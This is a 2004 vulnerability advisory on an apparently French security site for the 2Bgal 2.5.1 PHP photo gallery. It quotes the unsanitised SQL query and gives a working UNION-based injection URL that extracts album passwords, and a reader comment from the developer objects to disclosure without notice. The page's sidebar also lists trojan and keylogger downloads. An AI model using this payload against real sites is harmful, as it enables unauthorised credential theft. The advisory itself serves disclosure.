Welcome to Coding : Sécurité Programmation Réseaux

Search   in  

 Create an Account Home | Submit News Your Account Content | Topics | Top 10  


Accueil
· Home
· Listing des Articles
· Top 10
· Repository des Exploits

Les sujets / parties
· C / C ++
· Visual Basic
· Asm
· Reseaux
· Java
· Securite
· Divers

Utile
· Listing des Articles
· Telecharger
· Le Forum
· Liens
· Proposer un article

Top20 des Downloads
· 1: Etude des reseaux generalites et protocoles
· 2: Cheval de troie en VB avec sources
· 3: Netcat 1.1
· 4: Keylogger
· 5: Etudes des reseaux hauts debits architectures et protocoles
· 6: Ecoute de port
· 7: Etude du Smart Spoofing
· 8: Win Packet Capture Utils
· 9: Tutorial on Traffic Interception on Switched Lan using ARP spoofing
· 10: Cours de C

User Info
Welcome, Anonymous
Nickname
Password
(Register)
Membership:
Latest: trapcodien
New Today: 1
New Yesterday: 0
Overall: 2207
People Online:
Visitors: 43
Members: 1
Total: 44
Online Now:
01: trapcodien

  
2Bgal 2.5.1 SQL injection Vulnerability
Posted on Wednesday, December 22 @ 01:58:47 CET
Topic: Divers
Divers 

	2Bgal is fully customizable photo gallery. 
It's seems to be vulnerable at a SQL injection.


2Bgal 2.5.1 SQL injection Vulnerability
(http://www.ben3w.com/)
22/12/2004
----------------------------------------------------------------------
Description:
----------------------------------------------------------------------
2Bgal is fully customizable photo gallery. 
It's seems to be vulnerable at a SQL injection.


----------------------------------------------------------------------
Vulnerable code (disp_album.php(~53) and maybe disp_img.php)
----------------------------------------------------------------------
$chaine="SELECT nom,idpere FROM ".$tbl_alist." WHERE id=".$id_album;
$request = MYSQL_QUERY($chaine);
$nom_currentalbum = mysql_result($request,0,"nom");
$idpere_currentalbum = mysql_result($request,0,"idpere");



----------------------------------------------------------------------
Proof of concept (2Bgal with MySQL 4.x.x):
----------------------------------------------------------------------
http://www.server.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%
20passwd%20as%20nom,%20idpere%
20FROM%20galbumlist%20LIMIT%201; 

This code allow you to get password for the first album.
You can play with SQL injection code to get other passwords.


----------------------------------------------------------------------
Discovered by Romain Le Guen: 
http://coding.romainl.com
contact @AT@ romainl.com

 
Liens connexes
· Plus à propos de Divers
· Nouvelles transmises par Romain_Le_Guen
L'article le plus lu à propos de Divers:
Tutorial sur le fonctionnement de GDB (debugger sous linux)


Article Rating
Average Score: 1
Votes: 1


Please take a second and vote for this article:

Excellent
Very Good
Good
Regular
Bad


Options

 Format imprimable Format imprimable



Re: 2Bgal 2.5.1 SQL injection Vulnerability (Score: 0)
by Anonymous on Sunday, January 02 @ 23:51:38 CET
une version corrigeant cette faille vient d'être mise en ligne aujourd'hui. Ca aurait été bien d'en informer l'auteur du script avant de diffuser la news relative à cette faille, ou même de l'en informer tout court... Trouver un problème dans du code open source, c'est bien. Permettre à son auteur de la corriger, c'est encore mieux Ben


PHP-Nuke Copyright © 2005 by Francisco Burzi. This is free software, and you may redistribute it under the GPL. PHP-Nuke comes with absolutely no warranty, for details, see the license.
Page Generation: 0.36 Seconds